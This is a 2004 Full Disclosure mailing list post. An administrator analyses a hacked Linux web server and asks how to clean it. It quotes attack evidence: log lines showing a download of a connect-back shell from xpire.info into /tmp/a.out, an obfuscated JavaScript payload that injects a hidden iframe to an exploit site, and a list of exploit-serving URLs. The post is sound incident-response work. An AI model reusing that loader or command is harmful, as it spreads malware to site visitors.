Full Disclosure mailing list archives
xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Sun, 24 Oct 2004 13:47:04 +0200
Hi list, i'm doing some analysis on a Linux-Mandrake 9.0 web server of a person that was compromised in October. In this host now it's installed a special trojan that insert a malicious <IFRAME> tag into every served .PHP page. The host is running these services : Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server] Porta 22: SSH-1.99-OpenSSH_3.4p1 Porta 25: 220 XXXXX ESMTP 5.5.1 Porta 110: +OK <XXXX@XXXXXX> Porta 3306: MySQL 3.23.52 Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake Linux/6mdk) sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3 I've found inside Apache log that the hacker break-in inside the machine using an overflow and injecting an executable /tmp/a.out via "qmail-inject". These are the suspicious log lines : [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11) [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation fault (11) [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation fault (11) [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11) qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO" <angdimar () yahoo it> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation fault (11) [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11) [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation fault (11) qmail-inject: fatal: unable to parse this line: To: Drugo:Lebowski () libero it sh: -c: option requires an argument --15:50:07-- http://xpire.info/cli.gz => `/tmp/a.out' Resolving xpire.info... fatto. Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta inviata, aspetto la risposta... 200 OK Lunghezza: 19,147 [text/plain] 0K .......... ........ 100% 9.97K 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147] [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation fault (11) [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11) Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for Linux, possible containing a ConnectBack shell. Inside this ELF file you can grep these strings: Usage: %s host port pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't fork pty, bye! Fuck you so /bin/sh No connect Looking up %s... Failed! OK %u Connect Back I don't know if the hacker installs in this machine a rootkit, but the check of md5sum of ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr. was good....... The main problem is finding how the Apache Server (or PHP) was altered by the hacker, because every user that connects to this host now, could be infected by several HTML/IE recent exploits. Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a random way??) web server inserts a special javascript between HTTP-Header and served page. The script is : <script language=javascript> eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1 01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47 ,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10 5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1 16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34, 41)) </script> Decoding it, I see that it writes inside the page an <IFRAME> tag pointing to this url : <iframe src='http://www.splitinfinity.info/fa/?d=get' height=1 width=1></iframe> If you surf to this page (don't do this if you use IE or are not patched) you could got infected by several exploits, cause it opens a lot a <iframe> pointing out to different domains. I would to list here these domains, cause they are a sources for exploit studying : Domain: www.sp2fucked.biz http://69.50.168.147/user28/counter.htm Found MHTMLRedir.Exploit http://213.159.117.133/dl/adv121.php http://195.178.160.30/js.php?cust=28 http://195.178.160.30/ifr.php?cust=89 http://69.50.168.147/user28/exploit.htm Found Java class exploit http://69.50.168.147/user28/exploit2.htm My questions are : 1) how can I remove this injected Javascript/IFRAME ? I've checked httpd.conf and a lot of PHP pages, but I don't found anything.....Is it possible that the hacker install some compromised Apache module ..so??? 2) anyone knows before these sites (xpire.info or splitinfinity.info)? why they are still online and are serving trojan/exploit on surfer browser? xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe registration! Domain ID: D5946452-LRMS Domain Name: XPIRE.INFO Created On: 23-May-2004 19:41:15 UTC Last Updated On: 02-Aug-2004 08:07:20 UTC Expiration Date: 23-May-2005 19:41:15 UTC Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com (R159-LRMS) Status: ACTIVE Status: OK Registrant ID: C4752858-LRMS Registrant Name: Mike Fox Registrant Organization: n/a Registrant Street1: Hali-gali, 77 Registrant City: Deli Registrant Postal Code: 12345 Registrant Country: IN Registrant Phone: +91.226370256 Registrant Email: c8idkvtgarwinidkvt38 () yahoo com 3) how can I understand if a rootkit was installed??? Thanks anyone for replies EF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Nick FitzGerald (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Ron DuFresne (Oct 25)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 26)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- <Possible follow-ups>
- Re: xpire.info & splitinfinity.info - exploits in the wild bowwow (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 27)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 27)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)